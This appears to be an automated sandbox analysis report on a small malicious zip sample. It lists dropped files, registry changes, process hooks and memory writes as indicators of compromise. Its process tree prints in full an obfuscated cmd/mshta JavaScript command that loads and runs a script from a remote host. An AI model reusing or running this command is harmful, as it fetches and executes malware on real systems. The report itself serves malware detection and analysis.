caf9be696859f3351be78cd50888f0f0d8357f801de9c5ac7a74b60514636567

Analysis

max time kernel
95s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20240802-es
resource tags

arch:x64arch:x86image:win10v2004-20240802-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
05-09-2024 12:32

Target

caf9be696859f3351be78cd50888f0f0d8357f801de9c5ac7a74b60514636567.zip
Size

1KB
MD5

67c76c7192db0d35d32839aa77172c96
SHA1

3b49a04f818b421517d55a877677c962605ca0fb
SHA256

caf9be696859f3351be78cd50888f0f0d8357f801de9c5ac7a74b60514636567
SHA512

e31c613fb793b8e2a9aa961c39c931c530feacad95d583679f2a49b38d2ecda9d1ca8ea38e618f822bd105461924cb9e6d28317258225d32f7091482906222e6

Score

8^/10

Blocklisted process makes network request 4 IoCs

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	mspaint.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
828	mspaint.exe
828	mspaint.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
828	mspaint.exe
1312	OpenWith.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 3136 wrote to memory of 3796	3136	cmd.exe	100
PID 3136 wrote to memory of 3796	3136	cmd.exe	100

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\caf9be696859f3351be78cd50888f0f0d8357f801de9c5ac7a74b60514636567.zip
1⤵
PID:3224

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2368

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:4912

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/c MsHtA "jAvasCrIPt:try{var _1IlPQWA=["\104\122\x55\x55\x31\124\71","\x73\143\162\151\160\x74\x3a\x68\x54\x74\120\x53\x3a\57\57\x70\x6c\x61\154\151\156\x76\x61\154\x32\56\x73\x75\x62\151\x6e\144\x6f\155\x65\x74\x61\56\x77\157\x72\x6c\x64\57\x3f\x31\x2f"];GetObject(_1IlPQWA[1])[_1IlPQWA[0]]();}catch(ewx){}close()" >nul 2>&1&&exit
1⤵
- Suspicious use of WriteProcessMemory
PID:3136
- C:\Windows\system32\mshta.exe
  MsHtA "jAvasCrIPt:try{var _1IlPQWA=["\104\122\x55\x55\x31\124\71","\x73\143\162\151\160\x74\x3a\x68\x54\x74\120\x53\x3a\57\57\x70\x6c\x61\154\151\156\x76\x61\154\x32\56\x73\x75\x62\151\x6e\144\x6f\155\x65\x74\x61\56\x77\157\x72\x6c\x64\57\x3f\x31\x2f"];GetObject(_1IlPQWA[1])[_1IlPQWA[0]]();}catch(ewx){}close()"
  2⤵
  - Blocklisted process makes network request
  PID:3796

memory/4912-4-0x000001D952EA0000-0x000001D952EB0000-memory.dmp

Filesize
64KB

Download
memory/4912-0-0x000001D952E60000-0x000001D952E70000-memory.dmp

Filesize
64KB

Download
memory/4912-11-0x000001D95B170000-0x000001D95B171000-memory.dmp

Filesize
4KB

Download
memory/4912-13-0x000001D95B1F0000-0x000001D95B1F1000-memory.dmp

Filesize
4KB

Download
memory/4912-15-0x000001D95B1F0000-0x000001D95B1F1000-memory.dmp

Filesize
4KB

Download
memory/4912-17-0x000001D95B280000-0x000001D95B281000-memory.dmp

Filesize
4KB

Download
memory/4912-16-0x000001D95B280000-0x000001D95B281000-memory.dmp

Filesize
4KB

Download
memory/4912-18-0x000001D95B290000-0x000001D95B291000-memory.dmp

Filesize
4KB

Download
memory/4912-19-0x000001D95B290000-0x000001D95B291000-memory.dmp

Filesize
4KB

Download